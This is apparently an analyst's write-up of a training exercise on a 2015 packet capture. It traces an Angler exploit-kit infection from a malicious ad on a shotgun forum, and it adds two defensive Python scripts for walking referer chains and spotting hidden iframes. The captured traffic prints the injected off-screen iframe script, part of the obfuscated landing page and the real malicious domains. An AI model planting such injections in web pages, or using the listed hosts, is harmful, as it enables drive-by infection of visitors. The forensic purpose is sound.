So this one has a great comical backstory: the user Tom (ironically from the SOC) brought his personal laptop in and managed to get his system infected while looking for a shotgun to go hunting with. Outside of making me and one of my co-workers laugh at the scenario (and then another one asking if this could be based on a real event – lol), there is one thing I learned from this, and it came from reading the answers. Brad explains how he found the start of the infection chain by working backwards: apply the filter “ip contains [whatever the EK domain is]” in Wireshark, then keep stepping up the chain until you reach the start. I will have to remember this for my everyday work as well. Generally, I end up finding the end of the infection chain and just using the “Referer” header from the TCP stream to point me in the right direction. Definitely good to know, to say the least.
I also did not know that Bedep drops its encrypted binaries into memory and NOT onto disk. @Kafeine has more information about this here.
Lastly, since the malicious files were encrypted, I was not able to run them on my test VM. But I do have them, along with all the other artifacts from my investigation, on my GitHub page found here.
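To make the referer walk described above concrete, here is an added example. It is my code, not Brad's method as he wrote it nor anything from the original post, and it works on constructed request records rather than on the live pcap. It does the two steps in code: first the equivalent of “ip contains <EK domain>” to find every request that mentions the domain anywhere in its bytes, then a walk back through Referer headers until it reaches a URL for which no request exists, which is the page the user actually opened. The request headers are copied from the streams quoted later in this post and trimmed to the request line, Host and Referer.

```python
from typing import Dict, List

# Constructed sample: request headers from the streams quoted in this write-up,
# cut down to request line, Host and Referer (bodies and other headers dropped).
REQUESTS = [
    "GET /adserver/www/delivery/ajs.php?zoneid=1&withtext=1 HTTP/1.1\r\n"
    "Host: www.shotgunworld.com\r\nReferer: http://www.shotgunworld.com/\r\n\r\n",
    "GET /respondents/header.js HTTP/1.1\r\n"
    "Host: solution.babyboomershopping.org\r\nReferer: http://www.shotgunworld.com/\r\n\r\n",
    "GET /forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29 HTTP/1.1\r\n"
    "Host: neuhaus-hourakus.avelinoortiz.com\r\n"
    "Referer: http://solution.babyboomershopping.org/respondents/header.js\r\n\r\n",
    "GET /who.olp?save=&effect=VFv9cHM HTTP/1.1\r\n"
    "Host: neuhaus-hourakus.avelinoortiz.com\r\n"
    "Referer: http://neuhaus-hourakus.avelinoortiz.com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29\r\n\r\n",
    "GET /literature.disco?audience=5Hr HTTP/1.1\r\n"
    "Host: neuhaus-hourakus.avelinoortiz.com\r\n\r\n",
]

def parse_request(raw: str) -> Dict[str, str]:
    """Reduce one raw HTTP request to its absolute URL and its Referer."""
    lines = raw.split("\r\n")
    _method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line:                 # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"url": "http://" + headers["host"] + path,
            "referer": headers.get("referer", ""),
            "raw": raw}

def requests_containing(records: List[Dict[str, str]], needle: str) -> List[Dict[str, str]]:
    """Wireshark 'ip contains <needle>' equivalent: every request whose raw bytes
    mention the string, whether as Host, as Referer or inside a query string."""
    return [r for r in records if needle in r["raw"]]

def walk_back(records: List[Dict[str, str]], start_url: str) -> List[str]:
    """Follow Referer headers from start_url toward the first page in the chain.
    Stops at a URL we hold no request for (the root) or if the chain loops."""
    by_url = {r["url"]: r for r in records}
    chain, seen, url = [start_url], {start_url}, start_url
    while True:
        rec = by_url.get(url)
        if rec is None or not rec["referer"] or rec["referer"] in seen:
            break
        url = rec["referer"]
        chain.append(url)
        seen.add(url)
    return chain

def infection_chain(raw_requests: List[str], ek_domain: str) -> List[str]:
    """Root-first list of URLs from the page the user opened to the EK landing page."""
    records = [parse_request(r) for r in raw_requests]
    hits = requests_containing(records, ek_domain)
    if not hits:
        return []
    # The earliest request naming the EK domain is its landing page; walk back
    # from there and flip the result into chronological order.
    return list(reversed(walk_back(records, hits[0]["url"])))

if __name__ == "__main__":
    for step, url in enumerate(infection_chain(REQUESTS, "neuhaus-hourakus.avelinoortiz.com"), 1):
        print(step, url)
```

One thing the walk makes visible: the ad-server request (/adserver/www/delivery/ajs.php) never appears in the chain, because an iframe written by document.write carries the parent page (http://www.shotgunworld.com/) as its Referer, not the script that wrote it. The injected element only turns up through the contains-style search or by looking at what was fetched just before the redirector, which is why the Referer walk alone is not enough to name it.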
Basic Questions to Answer About Exercise:
=========================================
– Date and time of the activity.
> First Packet: 2015-11-24 10:13:42 / Last Packet: 2015-11-24 10:22:23 / Elapsed Time: 08:41
– The infected computer’s IP address.
> 10.1.25.119
– The infected computer’s MAC address.
> a4:1f:72:a6:9c:1b
– The infected computer’s host name.
> Turkey-Tom
– Domains and IP addresses of any infection traffic with VT detection ratio.
> 52.22.18.194:843 | 0 / 55
> 52.21.140.191:843 | 0 / 56
> 64.34.173.208 | www.shotgunworld.com | 1 / 66
> 162.216.4.20 | neuhaus-hourakus.avelinoortiz.com | 2 / 66
> 166.78.145.90 | rnhbhnlmpvvdt.com | 8 / 66
> 151.80.126.226 | chin.truffleman.co.uk | 1 / 66
> 95.211.205.229 | ncqauqvqqhhzpc.com | 1 / 66
– DNS requests noted during the investigation:
> 11981 176.540744 10.1.25.119 63767 8.8.4.4 53 DNS Standard query 0x2749 A jtikbwiyllxnyi61.com
> 11983 176.819935 8.8.4.4 53 10.1.25.119 63767 DNS Standard query response 0x2749 No such name
> 11984 176.821924 10.1.25.119 60109 8.8.4.4 53 DNS Standard query 0xc23c A ghgmtcrluvghlwc91.com
> 11988 176.915258 8.8.4.4 53 10.1.25.119 60109 DNS Standard query response 0xc23c A 127.0.1.1
> 11989 176.926720 10.1.25.119 58168 8.8.4.4 53 DNS Standard query 0x5cc3 A ghgmtcrluvghlwc91.com
> 11990 177.005193 8.8.4.4 53 10.1.25.119 58168 DNS Standard query response 0x5cc3 A 127.0.1.1
> 11997 178.041367 10.1.25.119 57199 8.8.4.4 53 DNS Standard query 0x043c A qidxwsfqblej.com
> 11998 178.171919 8.8.4.4 53 10.1.25.119 57199 DNS Standard query response 0x043c No such name
> 11999 178.173503 10.1.25.119 58882 8.8.4.4 53 DNS Standard query 0xdad5 A lnhxwmhoyjxqmtgn9u.com
> 12000 178.254598 8.8.4.4 53 10.1.25.119 58882 DNS Standard query response 0xdad5 A 127.0.1.1
> 12001 178.268719 10.1.25.119 52742 8.8.4.4 53 DNS Standard query 0x1cf7 A lnhxwmhoyjxqmtgn9u.com
> 12002 178.348164 8.8.4.4 53 10.1.25.119 52742 DNS Standard query response 0x1cf7 A 127.0.1.1
> 12040 179.351621 10.1.25.119 53261 8.8.4.4 53 DNS Standard query 0xf345 A hsgxnjpdzifkjl4r.com
> 12068 179.449632 8.8.4.4 53 10.1.25.119 53261 DNS Standard query response 0xf345 No such name
> 12073 179.452374 10.1.25.119 62977 8.8.4.4 53 DNS Standard query 0x57eb A xwhrskktvevezz0.com
> 12112 179.540378 8.8.4.4 53 10.1.25.119 62977 DNS Standard query response 0x57eb No such name
> 12113 179.542265 10.1.25.119 50010 8.8.4.4 53 DNS Standard query 0x2997 A rnhbhnlmpvvdt.com
> 12158 179.651092 8.8.4.4 53 10.1.25.119 50010 DNS Standard query response 0x2997 A 166.78.145.90
> 12163 179.663157 10.1.25.119 50005 8.8.4.4 53 DNS Standard query 0xb4c8 A rnhbhnlmpvvdt.com
> 12194 179.748103 8.8.4.4 53 10.1.25.119 50005 DNS Standard query response 0xb4c8 A 166.78.145.90
> 12303 179.968038 10.1.25.119 61287 8.8.4.4 53 DNS Standard query 0xb54b A qtllebdadvitdim.com
> 12334 180.059365 8.8.4.4 53 10.1.25.119 61287 DNS Standard query response 0xb54b No such name
> 12335 180.060984 10.1.25.119 56286 8.8.4.4 53 DNS Standard query 0x9da2 A wyvpeiyaxycznuia6.com
> 12372 180.155660 8.8.4.4 53 10.1.25.119 56286 DNS Standard query response 0x9da2 No such name
> 12373 180.157299 10.1.25.119 49396 8.8.4.4 53 DNS Standard query 0xb029 A ncqauqvqqhhzpc.com
> 12411 180.238941 8.8.4.4 53 10.1.25.119 49396 DNS Standard query response 0xb029 A 95.211.205.229
> 12415 180.252274 10.1.25.119 51862 8.8.4.4 53 DNS Standard query 0x7ebc A ncqauqvqqhhzpc.com
> 12453 180.348244 8.8.4.4 53 10.1.25.119 51862 DNS Standard query response 0x7ebc A 95.211.205.229
> 13636 193.071344 10.1.25.119 55508 8.8.4.4 53 DNS Standard query 0x8551 A chin.truffleman.co.uk
> 13637 193.272985 8.8.4.4 53 10.1.25.119 55508 DNS Standard query response 0x8551 A 151.80.126.226
– Information about malware found on the infected host.
> The malware associated with this infection looks to have been delivered by Angler EK, starting with a Flash exploit.
– The root cause (what is the likely cause of the infection noted in the pcap).
> The root cause of this infection is a compromised website (shotgunworld[.]com) serving a malicious ad, which injects a hidden iframe that redirects the end user to the Angler EK landing page.
Notes about investigation:
==========================
It looks like hxxp://www[.]shotgunworld[.]com is the initial compromised site: its own ad server (the /adserver/www/delivery/ajs.php request below) returns JavaScript that, alongside the legitimate banner, writes an iframe positioned thousands of pixels off-screen, so the user never sees it:
GET /adserver/www/delivery/ajs.php?zoneid=1&withtext=1&cb=99806861739&charset=utf-8&loc=http%3A//www.shotgunworld.com/&referer=http%3A//www.google.com/url%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D1%26sqi%3D2%26ved%3D0ahUKEwiKnu-0uqnJAhUIWD4KHal9DUcQFggcMAA%26url%3Dhttp%253A%252F%252Fwww.shotgunworld.com%252F%26usg%3DAFQjCNEURWbI-lwIgSRkGqiR9ALrodRMUw%26bvm%3Dbv.108194040%2Cd.dmo HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.shotgunworld.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.shotgunworld.com
Connection: Keep-Alive
Cookie: OAID=380cc1bbe19b8e1255013f1f986ddebe; OAVARS[abf85608]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22oadest%22%3Bs%3A26%3A%22http%3A%2F%2Fwww.gueriniusa.com%2F%22%3B%7D; __utma=249653828.1397841079.1448381776.1448381776.1448381776.1; __utmb=249653828.3.10.1448381776; __utmc=249653828; __utmz=249653828.1448381776.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmt_UA-44006917-3=1; __utmt_UA-24085258-3=1; __utmt_UA-17979443-1=1

HTTP/1.1 200 OK
Date: Tue, 24 Nov 2015 16:16:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=380cc1bbe19b8e1255013f1f986ddebe; expires=Wed, 23-Nov-2016 16:16:24 GMT; path=/
Content-Length: 1479
Connection: close
Content-Type: text/javascript; charset=utf-8

var OX_7f561e63 = '';
OX_7f561e63 += "<"+"iframe style=\"position:absolute;left:-3060px;top:-4000px;width:360px;height:357px;\" src=\"http://solution.babyboomershopping.org/respondents/header.js\"><"+"/iframe><"+"a href=\'http://www.shotgunworld.com/adserver/www/delivery/ck.php?oaparams=2__bannerid=3__zoneid=1__cb=0d1dc4c39c__oadest=http%3A%2F%2Fwww.americhoke.com\' target=\'_blank\'><"+"img src=\'http://www.shotgunworld.com/AmerichokeBanner.gif\' width=\'468\' height=\'60\' alt=\'Americhoke\' title=\'Americhoke\' border=\'0\' /><"+"/a><"+"br /><"+"a href=\'http://www.shotgunworld.com/adserver/www/delivery/ck.php?oaparams=2__bannerid=3__zoneid=1__cb=0d1dc4c39c__oadest=http%3A%2F%2Fwww.americhoke.com\' target=\'_blank\'>Choke tube installation barrel porting adjustable combs<"+"/a><"+"div id=\'beacon_0d1dc4c39c\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://www.shotgunworld.com/adserver/www/delivery/lg.php?bannerid=3&campaignid=3&zoneid=1&loc=http%3A%2F%2Fwww.shotgunworld.com%2F&referer=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D1%26sqi%3D2%26ved%3D0ahUKEwiKnu-0uqnJAhUIWD4KHal9DUcQFggcMAA%26url%3Dhttp%253A%252F%252Fwww.shotgunworld.com%252F%26usg%3DAFQjCNEURWbI-lwIgSRkGqiR9ALrodRMUw%26bvm%3Dbv.108194040%2Cd.dmo&cb=0d1dc4c39c\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
document.write(OX_7f561e63);
Once the connection is made to solution[.]babyboomershopping[.]org, header.js comes back as a chunked response (the c0 and 0 lines are chunk sizes) containing another off-screen iframe, this one pointing at neuhaus-hourakus[.]avelinoortiz[.]com:
GET /respondents/header.js HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.shotgunworld.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: solution.babyboomershopping.org
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Nov 2015 16:18:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3

c0
<iframe style="position:absolute;left:-3311px;top:-3861px;width:309px;height:326px;" src="http://neuhaus-hourakus.avelinoortiz.com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29"></iframe>
0
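Both redirects above rely on the same trick: an iframe the user cannot see. As an added example (my code, not part of the original write-up or of any tool it mentions), the script below normalises the ad server's tag-splitting ("<"+"iframe) and escaped quotes, then flags every iframe that is positioned far outside the viewport, sized to zero, or styled invisible. The inputs are trimmed copies of the two responses above plus one made-up benign banner; the 1000-pixel threshold is my own choice.

```python
import re

# Constructed samples: the ad-server JavaScript and the header.js body from the
# capture above, trimmed to the iframe and one banner link. The third sample is
# a made-up benign iframe to show what does not get flagged.
AD_JS = r'''var OX_7f561e63 = '';
OX_7f561e63 += "<"+"iframe style=\"position:absolute;left:-3060px;top:-4000px;width:360px;height:357px;\" src=\"http://solution.babyboomershopping.org/respondents/header.js\"><"+"/iframe><"+"a href=\'http://www.shotgunworld.com/adserver/www/delivery/ck.php?oaparams=2__bannerid=3\' target=\'_blank\'><"+"img src=\'http://www.shotgunworld.com/AmerichokeBanner.gif\' width=\'468\' height=\'60\' /><"+"/a>";
document.write(OX_7f561e63);'''
HEADER_JS = '<iframe style="position:absolute;left:-3311px;top:-3861px;width:309px;height:326px;" src="http://neuhaus-hourakus.avelinoortiz.com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29"></iframe>'
BENIGN = '<iframe style="width:300px;height:250px;" src="http://example.invalid/banner"></iframe>'

OFFSCREEN_PX = 1000   # assumption: nothing this far outside the viewport is meant to be seen

TAG_SPLIT = re.compile(r'"\s*\+\s*"')                      # "<"+"iframe  ->  "<iframe
IFRAME = re.compile(r'<iframe\b([^>]*)>', re.IGNORECASE)
ATTR = re.compile(r'''(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)')''')
STYLE_PX = re.compile(r'\b(left|top|width|height)\s*:\s*(-?\d+)px', re.IGNORECASE)

def normalize(markup: str) -> str:
    """Undo the two evasions in the ad JS: tags split across string
    concatenations, and quotes escaped inside the JS string literal."""
    joined = TAG_SPLIT.sub('', markup)
    return joined.replace('\\"', '"').replace("\\'", "'")

def iframe_attrs(markup: str):
    """Yield one {attribute: value} dict per <iframe> tag found."""
    for m in IFRAME.finditer(normalize(markup)):
        yield {k.lower(): dq or sq for k, dq, sq in ATTR.findall(m.group(1))}

def is_hidden(attrs: dict) -> bool:
    """True if the frame is off-screen, zero-sized, or styled invisible."""
    style = attrs.get('style', '').lower().replace(' ', '')
    if 'display:none' in style or 'visibility:hidden' in style:
        return True
    px = {k.lower(): int(v) for k, v in STYLE_PX.findall(style)}
    if px.get('width') == 0 or px.get('height') == 0:
        return True
    return px.get('left', 0) < -OFFSCREEN_PX or px.get('top', 0) < -OFFSCREEN_PX

def hidden_iframe_srcs(markup: str) -> list:
    """The src of every hidden iframe: these are the redirect targets to chase."""
    return [a.get('src', '') for a in iframe_attrs(markup) if is_hidden(a)]

if __name__ == '__main__':
    for name, sample in (('ajs.php', AD_JS), ('header.js', HEADER_JS), ('benign', BENIGN)):
        print(name, '->', hidden_iframe_srcs(sample))
```

Run against the two real responses it returns exactly the two redirect targets in the order the browser followed them, and nothing for the benign banner; in practice you would feed it every text/html or text/javascript body from the capture and chase the URLs it returns.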
Once the connection has been made to neuhaus-hourakus[.]avelinoortiz[.]com, it lands the user on an Angler EK landing page, recognisable by the tell-tale filler of quoted novel text with obfuscated scripts spread throughout. (Note that this server's Date header runs about an hour ahead of the other servers in the capture, so order events by packet time, not by server Date.)
GET /forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://solution.babyboomershopping.org/respondents/header.js
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: neuhaus-hourakus.avelinoortiz.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Tue, 24 Nov 2015 17:13:18 GMT
Content-Type: text/html
Content-Length: 94921
Connection: keep-alive

<!DOCTYPE html> <html> <head> <title> you something that might you, </title> </head> <body> <strike> "How horrid all this tumbling about and I believe I have borne with calmness, and she dared not follow her to accept your invitation here?"-- "It was my comfort. </strike> <ol> Yet, though smiling to see them once; <u> <em> " This however was not very likely." "Well, and whose possessions he was monstrous happy, and rather better pasturage for their ease and enjoyment, and only prevented from being her relations too made it appear that she had hoped to be to </em> might at present confess to her own composure of voice, under which was exactly the reverse of her mind might be found when the life of sin. Her legal allowance was not in the and </u> <ol> A man must pay for his intrusion on that head.
The would probably have passed without suspicion, had he married you, he have <i> s delicate, enquiries </i> </ol> <form> Their opportunity of introducing it, and on misters They's suggestion; and humoured </form> </ol> <div style=" width:8px; height:18px;"><p ui ="I3Zj-#qm1pQOPHiOOprmDg">wd['p]i' mO wwhno'V=u ncia'x( nio1t;fWxtv{ard ) wetnaT = e)e; aDa et arDvt(pmtlu; op et {D =dnlmtawn Dt}=hw)( e a e ; t mpadl e eatiDe( -t;T }fo escnnu< x)it btas(iDwo{ n)teaaw dOpmV];'ni = ['hw''wo[vg'ro ;= u]dWw't e = awaodesilvfrt ;nWvbaM=.niLj cwufO jwv.OWasow cM udbwfLj=.ofvWjn 1uaLbiOdwcMfdiowfu LjWOMv=.wnabct=; i2s nuoff} tcnruy( dt'[w o{e)Qeniw]F =t}tnueu rr x' ;f oxTxet {l()tceinni e sut,arr = vlrr""al=in.(y..ta/mae hc( )fo i/0 av ()rg; r= arag ;l.ty;ri<neh{) rs=+rttl uie+ + Sr.omhenraCr(aiCgfdop(nara e/)i[3ysrIt,]2 rte)tlnrsu2e;}r ua r cd mu Loj;M}v =ce.tEeyn"(neImeltgBtdcu") bep1c"GW,aM= pc 2=iG"= "dcln",G ;1+1"dhnGoi ;c" Cc uftuTe(, r)rv nsxr{ ae w m; o.eg axI=n)(x a= ;clx .x nrodrs=st);MaecGLj"cT x("[+]c(x;r+;0ern 1)G2ut nfctou}fpx en i urT_) {x'fa6ur7T( ,r(e4uk2u606u65k7374325o4246q0oe676c6462766iagg3gc 0,f5i+22327'o x;Treark37'7( u) 6466u3kouu477065252464e0q4ci62 '6o5666627aor,);}t nufi + f cnoVu(){nTgifia x re( vurseAitxenengaro..tdS'IE)1f &== O'(M- &aito.ranoppsanrvgeVixdOf'ni)'irtT.(need/1 ) n= }te;r {=-ru ! !wn_iD_woId if(_.ELOBA_LVOCNOECERTOOS__NLIE'MRB||_ MNAD( _TEOOSOWS_OCL_OLSRSNENFC'idF))w onA EUniwDeatb; tees a{ast)(s(r);r;u ut eQ eynr}v x,xKaep= a0v rk' sIyeVrtsKl+ u'rik.' a'o +'gyJ.Pdire baulnrsipA v= 'ixpatac, 1 x2= x'10x' 0,+ . x= 04,0_ +_ x 3.'5t;ry{=1wevk . 
' xnvteXbxA ;ce1j Oci(t)wd.seei }t ;=w2nour (ce){=alavk c th xfr y e wxvnks{;t= eeiXOj2c} tc)eAbtvx(;ht(e cafk ={ )acxv t;ry{=swevk l e xnvteXbxA ;ce3j Oci(t)cah()x f { }ectvk= ewidelrt.w=oans;1s } ve{ fix u};}k()attaa sQt(ess beD;)e)y; e ev ru}turr(;n a tha[rc4 a tad p ='886oaoii63447666654co86a4g8u26s6267667aau626626,'343323323a4qc7e2o'q46457 6545ac426a0ue67686572676uo0842a6os6686757554uuc666sas627a2662576gu6u34ce4' 3a'333223c,eq624cce75a4657475oqa4208o2o56u7665766u6207a8u8s64u66575466s6c2sau6436g2756762a66630i,uu43i 32323'c'626oai4875o7576666c4o244ueaa62g77766640a0842886u6686676727iio67as6ss26i7666757s8ag2u66a23243362762u2',502o0a6646736' 62oo6502ooa66467667562o0658u6o246u5666727ooo06i6i0s67266767668u6o6a8u6267a67775750sci6aom8a66u2676676usua2644g832u327362360f;or( ;0ra=v' ] i p<atdeihtatna h l.g)+ xr( ht_epu;T+ifpaia],sra ;Qtyed t[eu)ahta=;af un p tdll}otn T)nv eu ruxci(A{2 ="2r074o75a k6m6646mi2ao5406267776o46270amm027477466766i k= 46,5qs6i2"" 387277a7246 =,"00c6i4k 768677450s684"aisa6276a7626 ,870i64a6i7" "56645087ouk81=26276a7626 ,870i64a6i7" "55"44k45,ak02=a4 4 6554 2o652i34="8545 ="g"o67o650 ,k66aga2s8uo436o2666672o626304 u5" ,="23236k 66633662os2o4o8qc86623u2332"ec3c4u664a33hadaa' 26 =4 ,tpt [q2e74a8o67746666767ias278i20e74q6226466qoa45oqq2g76466667662a8s6oo48432u22762636u,4 'qe0476266343'7o2i478a2a872667666740sqq62o4io56e67662472ais6s60aa63023776630sua264igm44u5273624862q4eaqio6 ,6'44444"2426a4ae027i7776676868s6iq02u67a6442677goo86q4sig7626666752aa6u34u0a" 34"3622230,o27e24q87647746666ai0642sqag7684766722iauo6i840a66o6577666q2ga6auus0336322267244",4q222a67o7636" 6e48i6a6s4i640726777628ga70o8qa76u5626477iosi760ssg73063636620a6u34u6ai4484462225ime24a,4qs65'6 4"4478aq06i6o8i6645766245u8s26ia88645q6677665oqcs6ieouu26s62666668ou4266i6,'303323323i8486asq'662866 65740iou58is4a76867766562i8o6q68qq67i67655576aag66me6866i2646666ssuo2646oi32u326362360,8 k +ic3k +323' 3'006cuess62467263250ieu76048676e6562677um826iu 8,57s+67667'6k k3+sk '3'3 2+2c0k,2 'ks2 33k++5 +ek 
5,k30' + 23 '+k +003i k4 +6k2+3'33 , '+340 3,632+3k3 '0k k3+0k233'3 2+342c27kmoo86642756676ssuo2644oo44u426362442 k2+ o343k' 4 ',+ 353o73+3 ,c3kg0g24 '6k+3 3256432'k+ 03333c'+27k ,6 ko ggk +3 2323 7o030s38+'s25'3 +6+3 3k ,gkgc 2k33a235 3gs2o0+s'2037+'k6 k3 + 23kg,c + 23s32733g23gs'02ao536+, 2 '3' ++ ck k3k 3202333'co5g42sasg73 6k2+++c34k k, 0' 0+k, s 02kk 253'+ 423s3' + k+k +0'e,52+0 '4ikk+30'3 34 30 k+ 43,30+ 406k 2' 3+'k6 k3+ 24k2,0 +004322c'm66o75 33372kos2s8u4436o2676662o64442o u+ 'ok42444, 2+0 '44kg73053 34 32o c+k, g 02kk 363'+ 4330333 'co5g6+2'4g73 6k2+++234k k, 0'0s2s0g8 '7o3533233gck,2 k3204'k++6 + 323s3532+ g7coa0s0g3'2 +k'6a3 034k ,k +2s032ocsk+3g'725323g k+ 43,2a+ 206k 2' 332457'36kg3 gso0sc3++2 k12 s2 +3 ,4k 3'80s5og 0,63g+33723'ck k4 3k3s' a+ 12+23253o73+2 ,c3kg0gs0 '6k+41+a2033'2 k 32so27ggksk 'c632335+ ,4 1 2 2023s'2++ka3375g33632k ',csg4ok+ 2k +'s+o53032 4240cg' k g4k ,+67+332k 2 0327 3g03gs26+'o536+, 23'' + ck k4k+0s5og 6,63g+33723'ck k4 ;kro6k + 22+] f ai <(ta ; 0 =vr ip.tleg+dx ;hithnaa+ )pef(aar,]dh[tTpu_taiattaaks =)e2s beD ; k=40==3244k k 1k3k =k6=p = 5 4k =tda tTxlu}na=ha;l )V; T)uWxeu;rrxe((A 4(00; i a)t1 </p> <form>
From here I can see a POST back to the site, most likely passing information about the system so the kit can pick the right exploit:
POST /forums/fiscal.hypetemplate?machine=0erT2JL5&idea=bAtrR&oh=&other=4vm3vmKv&woman=&shoot=gN9eEjH&process=f2r-BDMy&minute=&larger=kST8&difficult=WgR0Lms5 HTTP/1.1
Accept: */*
Content-Type: text/html; charset=utf-8
Referer: http://neuhaus-hourakus.avelinoortiz.com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: neuhaus-hourakus.avelinoortiz.com
Content-Length: 188
Connection: Keep-Alive
Cache-Control: no-cache

cEZQAoBD1JC2osm3oFWTx6csMwLYXl+8RNz2OEKzknDTEKBSkw4/mlx1gN/345+/pYTRuM5b/246rNtClafKXD4ry38xe+d968qKHE/Uo26gHKN5w+cOrO0lxSquj/PE41q2pvRFKl4MIpPiN1uaJg7lsHGCoUcbJgmQPqmO2CBlBK+6zgUxNzg0MA==

HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Tue, 24 Nov 2015 17:13:21 GMT
Content-Type: text/html
Content-Length: 2384
Connection: keep-alive
And here is the malicious Flash file (the x-flash-version header tells the server the victim is running Flash 19.0.0.207, and the CWS bytes at the start of the response mark a zlib-compressed SWF):
GET /who.olp?save=&effect=VFv9cHM&you=LmzXy&picture=J0sYyqN&why=Dv0ZsHPosOWnZsEC9KJ9myAYKZSGT HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://neuhaus-hourakus.avelinoortiz.com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29
x-flash-version: 19,0,0,207
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: neuhaus-hourakus.avelinoortiz.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Tue, 24 Nov 2015 17:13:22 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 75602
Connection: keep-alive

CWS #*..x....X.A.- .`............].....ACp.......w
And another POST to the server, this time with the Flash file's URL as the Referer, so it comes from the running SWF rather than from the landing page script:
POST /station.htm?again=&meet=wuzqI0&indeed=ypZLR7M&artist=&give=V_CvGhey&throw=&agreement=IWAIiztB-DCJSkcANq-qiph2Tah HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://neuhaus-hourakus.avelinoortiz.com/who.olp?save=&effect=VFv9cHM&you=LmzXy&picture=J0sYyqN&why=Dv0ZsHPosOWnZsEC9KJ9myAYKZSGT/[[DYNAMIC]
x-flash-version: 19,0,0,207
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: neuhaus-hourakus.avelinoortiz.com
Connection: Keep-Alive
Cache-Control: no-cache

xWRNDYEAqwYYwZ+peJN+So3iLI4/QWR/Z3+2aQkLn2RlsXwiqFOkyIbC1EWZuHWy1CwXdWfy+RfJh1cyIB9dOMCnPQoXtnlZlJOKDFFa85bHYiPt9q9iAnzuol+r63UCM1/u1X2tFaTTCi1Xked2sZIbqZgt6wuUqzLOo+28kb0VXiGBYGgKMTksMCwwLDIwNw==

HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Tue, 24 Nov 2015 17:13:26 GMT
Content-Type: text/html
Content-Length: 5528
Connection: keep-alive
And here is the site delivering the malicious binary files to the user's system. Note that these two GETs carry no Referer or User-Agent header and send Accept-Language: en-EN instead of the browser's en-US, which points to the exploit's payload, not Internet Explorer, issuing them; both responses are exactly 660972 bytes:
GET /literature.disco?audience=5Hr&trip=&election=txK1BgKFW&piece=aRLmxzX&normal=QGOT&understand=IWOBe&theory=so8bghs&discover=y47E5&tell=gSIQ&opportunity=ZWe&available=z HTTP/1.1
Connection: Keep-Alive
Accept-Language: en-EN
Host: neuhaus-hourakus.avelinoortiz.com

HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Tue, 24 Nov 2015 17:13:27 GMT
Content-Type: application/octet-stream
Content-Length: 660972
Connection: keep-alive
-----
GET /yes.wbxml?unite=tXu9a5tJI&writer=J7y8dCR8F&describe=LzQOS9&for=&note=C26Z8129ea&number=gcsXv8v&next=2unI-c8 HTTP/1.1
Connection: Keep-Alive
Accept-Language: en-EN
Host: neuhaus-hourakus.avelinoortiz.com

HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Tue, 24 Nov 2015 17:13:31 GMT
Content-Type: application/octet-stream
Content-Length: 660972
Connection: keep-alive
